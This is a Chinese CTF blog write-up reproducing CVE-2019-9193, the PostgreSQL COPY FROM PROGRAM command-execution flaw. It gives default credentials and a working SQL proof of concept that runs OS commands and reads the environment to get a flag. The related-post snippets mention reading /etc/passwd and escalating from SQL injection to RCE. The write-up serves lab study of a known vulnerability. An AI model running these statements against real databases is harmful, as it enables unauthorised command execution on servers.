buuctf [Postgres]CVE-2019-9193

最新推荐文章于 2023-12-23 00:32:38 发布
最新推荐文章于 2023-12-23 00:32:38 发布
阅读量549 收藏
点赞数
分类专栏: buuctf real
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36241198/article/details/115387606
版权

漏洞描述

PostgreSQL( 读作 Post-Gres-Q-L)是一个功能非常强大的、源代码开放的客户/服务器关系型数据库管理系统(RDBMS)。采用类似MIT的许可协议,允许开发人员做任何事情,包括在开源或闭源产品中商用,其源代码是免费提供的。

PostgreSQL特点:

支持WINDOWS、Linux、Solaris、macOS 、BSD。

支持文本、图像、视频、声音等

支持ACID、关联完整性、数据库事务、Unicode多国语言。

支持临时表,与物化视图

支持SQL的许多功能,例如复杂的SQL查询,子查询,外键,触发器,视图,视图,多进程并发控制(MVCC)、异步复制。

PostgreSQL 9.3至11.2版本中的导入导出数据命令COPY TO/FROM PROGRAM存在操作系统命令注入漏洞。攻击者可利用该漏洞获取数据库超级用户权限,从而执行任意系统命令。
https://www.freebuf.com/vuls/261361.html

漏洞影响
PostgreSQL 9.3至11.2

漏洞复现

直接navicat连接数据库,数据库初始账号密码为postgres
在这里插入图片描述
执行如下POC:

DROP TABLE IF EXISTS cmd_exec;
CREATE TABLE cmd_exec(cmd_output text);
COPY cmd_exec FROM PROGRAM 'id';
SELECT * FROM cmd_exec;

在这里插入图片描述注:这个漏洞介于权限提升和任意代码执行之间,它需要一些前提权限,这些权限可以是通过正常的登录PostgreSQL也可以是通过SQL注入获得与PostgreSQL交互的途径。需要说明的是,上述两种情形下都需要用户是一个超级用户或者是“pg_read_server_files”组用户

1.执行删除你想用来保存命令输出但是可能存在的表,这一步可有可无

DROP TABLE IF EXISTS cmd_exec

2.创建用来保存命令输出的表

CREATE TABLE cmd_exec(cmd_output text);

3.通过 “COPY FROM PROGRAM”执行系统命令

COPY cmd_exec FROM PROGRAM ‘id’;

4.将结果显示出来

SELECT * FROM cmd_exec;

打印环境变量
在这里插入图片描述
拿到flag!

exploitsec
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Postgres-XL集群部署文档2022.docx
03-12
Postgres-XL是一个高度可扩展的开源SQL数据库集群,它基于PostgreSQL并专注于处理复杂的数据库工作负载,包括完全ACID事务一致性、OLTP(在线事务处理)和OLAP(在线分析处理)应用。Postgres-XL引入了MPP(大规模...
【CVE】CVE-2019-9193:PostgreSQL 任意命令执行漏洞
边扯边淡
08-01 3458
【CVE】CVE-2019-9193PostgreSQL任意命令执行漏洞
postgre提权(CVE-2019-9193)
weixin_45701675的博客
11-18 1215
PostgreSQL是一款关系型数据库。其9.3到11版本中存在一处“特性”,管理员或具有“COPY TO/FROM PROGRAM”权限的用户,可以使用这个特性执行任意命令。 提权利用的是漏洞:CVE-2019-9193 CVE-2018-1058 本次演示CVE-2019-9193提权 复现步骤 开启测试环境 连接postgres 新建查询,执行 尝试读取敏感文件 cat /etc/passwd,低权限用户无权限查询 测试成功 ...
PostgreSQL高权限命令执行(CVE-2019-9193)漏洞复现&实战
jihaichen的博客
04-26 2701
一、漏洞利用 这个漏洞是一个版本漏洞 从9.3版本开始,Postgres新增了一个COPYTO/FROMPROGRAM功能,允许数据库的超级用户以及pg_read_server_files组中的任何用户执行操作 系统命令,利用的前提 1、需要登录2、需要高权限 所以要先弱口令爆破之后,然后查看是否是高权限。 这里之所以选择复现这个漏洞,因为其中的思路比较有意思,也就是看回显的思路。 先大体讲一下这个漏洞是怎么看回显的,他是通过命令执行然后把回显写入创建的一张表里面,下面来具体操作。 先删除你
CVE-2019-9193)PostgreSQL 高权限命令执行漏洞
m0_48520508的博客
01-20 870
0x00简介 PostgreSQL( 读作 Post-Gres-Q-L)是一个功能非常强大的、源代码开放的客户/服务器关系型数据库管理系统(RDBMS)。采用类似MIT的许可协议,允许开发人员做任何事情,包括在开源或闭源产品中商用,其源代码是免费提供的。 PostgreSQL特点: Ø 支持WINDOWS、Linux、Solaris、macOS 、BSD。 Ø 支持文本、图像、视频、声音等 Ø 支持ACID、关联完整性、数据库事务、Unicode多国语言。 Ø 支持临时表,与物化视图 Ø 支持SQL的许多功
CVE-2019-9193 PostgreSQL 高权限命令执行漏洞
qq_51979295的博客
10-08 562
康复训练
postgressql-16.0.1 windows x64
10-08
16新特性: 1.权限管理 2.逻辑复制增强功能 3.性能提升:并行查询方面的性能提升,比如允许FULL和RIGHT JION在并行模式下执行,支持SIMD 4.全面的监控功能
postgres-xl集群资料
04-20
Postgres-XL是PostgreSQL数据库的一个扩展,设计用于支持大规模并行处理,以满足高性能和高可用性的需求。它将单个数据库实例分解为多个节点,每个节点可以在不同的服务器上运行,实现数据的分布式存储和处理。这个...
flink-connector-postgres-cdc-1.4.0.jar
04-21
flink-connector-postgres-cdc-1.4.0.jar
Postgres-XL源码安装包
08-01
Postgres-XL源码安装包 用法详见博客文章: https://blog.csdn.net/fm0517/article/details/81329309
练习:SQL注入——PostgreSQL
m0_51322401的博客
02-01 1757
不同于mysql数据库的union select 1,2,3,4,该i数据库的使用null来替代,union select null,null,null,null,在中间输入之后同样使用and1=2来进行报错即使and 1=2 union select null,null,null,null。and 1=2 union select ‘null’,null,null,null 错误。and 1=2 union select null,null,null,‘null’ 错误。依次序使其测出显位。
CVE-2019-9193)PostgreSQL 高权限命令执行漏洞的复现
最新发布
m0_69801663的博客
12-23 1090
CVE-2019-9193)PostgreSQL 高权限命令执行漏洞
漏洞复现之PostgreSQL任意命令执行(CVE-2019-9193)
Blood_Pupil的博客
05-09 5481
PostgreSQL任意命令执行(CVE-2019-9193) PostgreSQL是当下最流行的数据库系统之一,它是 Mac OSX系统下常用的数据库,但是同时也提供Windows和Linux操作系统版本 今天,我将要给大家介绍一个PostgreSQL的鲜为人知的特性,这个特性允许数据库的特定用户在PostgreSQL环境中执行任意代码并且在PostgreSQL 9.3至最新版本(11.2)...
PostgreSQL 高权限命令执行漏洞(CVE-2019-9193)
EC_Carrot的博客
07-21 435
漏洞简介 PostgreSQL是PostgreSQL组织的一套自由的对象关系型数据库管理系统。该系统支持大部分SQL标准并且提供了许多其他特性,例如外键、触发器、视图等。 PostgreSQL 9.3至11.2版本中的导入导出数据命令‘COPY TO/FROM PROGRAM’存在操作系统命令注入漏洞。攻击者可利用该漏洞获取数据库超级用户权限,从而执行任意系统命令。 漏洞复现 我使用的是vulhub的环境,默认账号密码为postgres/postgres 登陆PostgreSQL:psql --host y
PostgreSQL JDBC Driver RCE&任意文件写入漏洞【CVE-2022-21724】
Armandhe的博客
05-10 3262
PostgreSQL JDBC Driver RCE&任意文件写入漏洞【CVE-2022-21724】
记一次Postgresql从堆叠注入到RCE
郁离歌丶的博客
02-01 1227
记一次Postgresql从堆叠注入到RCE 文章目录记一次Postgresql从堆叠注入到RCE限制udfhackbypasssqlmap的思路rwctf2021-DBaaSadge闲话 本次研究过程来自一次某cms的代码审计实战,整个环境部署的相对较好,postgresql、web权限都有单独的用户管理,web目录不可写、服务器不能出网等限制。不过比较幸运的是所有的数据操作都是用同一个superuser权限的postgresql用户来执行的。 限制 审计发现某处存在postgresql堆叠注入,发现po
CVE-2019-9193(高权限远程命令执行漏洞)vulhub复现
qq_52279315的博客
05-17 530
vulhub靶场复现【postgresql】
PostgreSQL 高权限命令执行漏洞复现(CVE-2019-9193)
又菜又爱倒腾的博客
10-29 1740
#PostgreSQL 高权限命令执行漏洞(CVE-2019-9193)# 一、漏洞简介 PostgreSQL是功能强大的数据库软件,可在所有主要操作系统上运行,包括Linux,Windows,Mac OS X等。所公开的漏洞存在于命令“COPY TO / FROM PROGRAM”中,用于导入和导出数据。在“pg_read_server_files”组中的用户执行上述命令之后,可以获得数据库超级用户权限,从而执行任何系统命令。 二、漏洞影响 影响版本 PostgreSQL 9.3-11.2 三、产生原因
PostgreSQL的insert注入
aixuan9365的博客
03-26 635
写这篇文是在昨夜的ctf中遇到的。 ctf地址:bloody-feedback.quals.2017.volgactf.ru email存在注入,在ctf中发现注入就很好办了,只要找到能绕过的方法就行。发现有pg开头,联想到PostgreSQL数据库 试着补全语句 发现错误回显的有效信息更多了, ERROR: INSERT ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值